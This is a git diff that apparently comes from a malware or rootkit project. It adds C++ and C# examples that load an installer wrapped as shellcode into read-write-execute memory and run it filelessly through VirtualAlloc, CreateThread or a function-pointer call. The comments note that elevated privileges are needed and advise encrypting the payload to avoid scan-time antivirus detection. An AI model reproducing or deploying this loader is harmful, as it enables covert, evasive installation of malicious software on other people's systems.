diff --git a/Docs/Documentation.docx b/Docs/Documentation.docx index 0c12127..af16a47 100644 Binary files a/Docs/Documentation.docx and b/Docs/Documentation.docx differ diff --git a/Examples/InstallShellCode.cpp b/Examples/InstallShellCode.cpp index c57b37d..2095b06 100644 --- a/Examples/InstallShellCode.cpp +++ b/Examples/InstallShellCode.cpp @@ -2,22 +2,24 @@ // Example on how to use Install.shellcode -// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode +// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode. int main() { + // --- Elevated privileges required --- + // 1. Load Install.shellcode from resources or from a BYTE[] - // Ideally, encrypt the file and decrypt it here to avoid scantime detection + // Ideally, encrypt the file and decrypt it here to avoid scantime detection. LPBYTE shellCode = ... - // 2. Make the shellcode RWX + // 2. Make the shellcode RWX. DWORD oldProtect; VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect); - // 3. Cast the buffer to a function pointer and execute it + // 3. Cast the buffer to a function pointer and execute it. ((void(*)())shellCode)(); - // This is the fileless equivalent to executing Install.exe + // This is the fileless equivalent to executing Install.exe. return 0; } \ No newline at end of file diff --git a/Examples/InstallShellCode.cs b/Examples/InstallShellCode.cs new file mode 100644 index 0000000..d273f47 --- /dev/null +++ b/Examples/InstallShellCode.cs @@ -0,0 +1,35 @@ +using System; +using System.Runtime.InteropServices; + +// Example on how to use Install.shellcode + +// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode. + +public static class Program +{ + public static void Main() + { + // --- Elevated privileges required --- + + // 1. Load Install.shellcode from resources or from a byte[] + // Ideally, encrypt the file and decrypt it here to avoid scantime detection. + byte[] shellCode = ... + + // 2. Create an RWX buffer with the shellcode. + IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40); + Marshal.Copy(shellCode, 0, buffer, shellCode.Length); + + // 3. Start the shellcode in a thread and wait until it terminated. + IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _); + WaitForSingleObject(thread, 0xffffffff); + + // This is the fileless equivalent to executing Install.exe. + } + + [DllImport("kernel32.dll")] + private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect); + [DllImport("kernel32.dll")] + private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId); + [DllImport("kernel32.dll")] + private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds); +} \ No newline at end of file